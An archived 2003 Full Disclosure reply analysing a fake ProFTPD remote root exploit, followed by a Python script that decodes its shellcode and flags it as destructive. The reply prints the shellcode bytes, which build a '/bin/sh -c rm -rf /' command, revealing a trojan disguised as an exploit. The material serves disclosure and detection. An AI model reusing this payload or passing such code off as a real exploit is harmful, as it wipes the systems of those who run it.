Full Disclosure mailing list archives

Re: ProFTPD-1.2.9rc2 remote root exploit


From: Philipp Buehler <pb+full-disclosure () mlsub buehler net>
Date: Fri, 24 Oct 2003 17:34:53 +0200

On 24/10/2003, GARCIA Lionel <lionel.garcia () airbus com> wrote to full-disclosure () lists netsys com:
--->   void(*sleep)()=(void*)sc;sleep(5);   <------- Hummm :-\

obscure the obvious :)

The shellcode seems to be locally launched. Anybody to "decrypt" the
shellcode ?

Well, not "fully", since this already gives enough clues:
\x31\xc0                xorl %eax,%eax
\x50                    pushl %eax
\x68\x66\x20\x2f\x58    pushl $0x66202f58 !"f /X"
\x68\x6d\x20\x2d\x72    pushl $0x6d202d72 !"m -r"
\x68\x2d\x63\x58\x72    pushl $0x2d635872 !"-cXr"
\x68\x41\x41\x41\x41    pushl $0x41414141 !"AAAA"
\x68\x41\x41\x41\x41    pushl $0x41414141 !"AAAA"
\x68\x41\x41\x41\x41    pushl $0x41414141 !"AAAA"
\x68\x41\x41\x41\x41    pushl $0x41414141 !"AAAA"
\x68\x2f\x73\x68\x43    pushl $0x2f736843 !"/shC"
\x68\x2f\x62\x69\x6e    pushl $0x2f62696e !"/bin"
\x31\xc0                xorl %eax,%eax

Then some "creative hopping" to connect this to a "/bin/sh rm -rf /"

If shellcode matches 0x72, 0x6d, 0x2d and 0x66 .. always be "alerted" :>


'LOVE' in the air ... :)

ciao
-- 
Philipp Buehler, aka fips | <double-p>

When the horse dies, get off.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
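As an added example (not part of the post above), the following decoder rebuilds the stack image that push-immediate shellcode like the one listed builds, and applies the check the reply suggests: alert whenever the recovered bytes contain "rm -r". It handles only the three opcodes the listing uses; the byte sequence is constructed from that listing and the marker list is an assumption.

```python
import struct

# Constructed from the byte sequence in the reply: xor eax,eax; push eax; 9x push imm32; xor eax,eax.
SHELLCODE = bytes.fromhex(
    "31c0" "50"
    "6866202f58" "686d202d72" "682d635872"
    "6841414141" "6841414141" "6841414141" "6841414141"
    "682f736843" "682f62696e"
    "31c0"
)

def decode_pushes(code: bytes):
    """Minimal x86-32 decoder for xorl %eax,%eax / pushl %eax / pushl $imm32.
    Returns the 4-byte words in the order they are pushed, as they sit in memory."""
    words, i, eax = [], 0, None
    while i < len(code):
        op = code[i]
        if code[i:i + 2] == b"\x31\xc0":     # xorl %eax,%eax -> eax = 0
            eax, i = 0, i + 2
        elif op == 0x50:                     # pushl %eax
            if eax is None:
                raise ValueError("push of uninitialised eax")
            words.append(struct.pack("<I", eax))
            i += 1
        elif op == 0x68:                     # pushl $imm32; little-endian immediate lands in memory as written
            words.append(code[i + 1:i + 5])
            i += 5
        else:
            raise ValueError(f"unhandled opcode 0x{op:02x} at offset {i}")
    return words

def stack_image(code: bytes) -> bytes:
    """The stack grows downward, so the last word pushed sits at the lowest address:
    the memory image is the pushed words in reverse order."""
    return b"".join(reversed(decode_pushes(code)))

# Markers to alert on (assumed list); the reply's 0x72,0x6d,0x2d,0x66 clue is "rm -f" / "rm -rf".
DESTRUCTIVE = (b"rm -rf", b"rm -r")

def looks_destructive(code: bytes) -> bool:
    """True when the rebuilt stack string carries a destructive command."""
    image = stack_image(code)
    return any(marker in image for marker in DESTRUCTIVE)

if __name__ == "__main__":
    print(stack_image(SHELLCODE))
    print("destructive:", looks_destructive(SHELLCODE))
```

The image comes out as "/bin/shC", 16 bytes of "A" padding, then "-cXrm -rf /X" and a NUL; the C and X bytes are the placeholders the later "hopping" patches into terminators.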
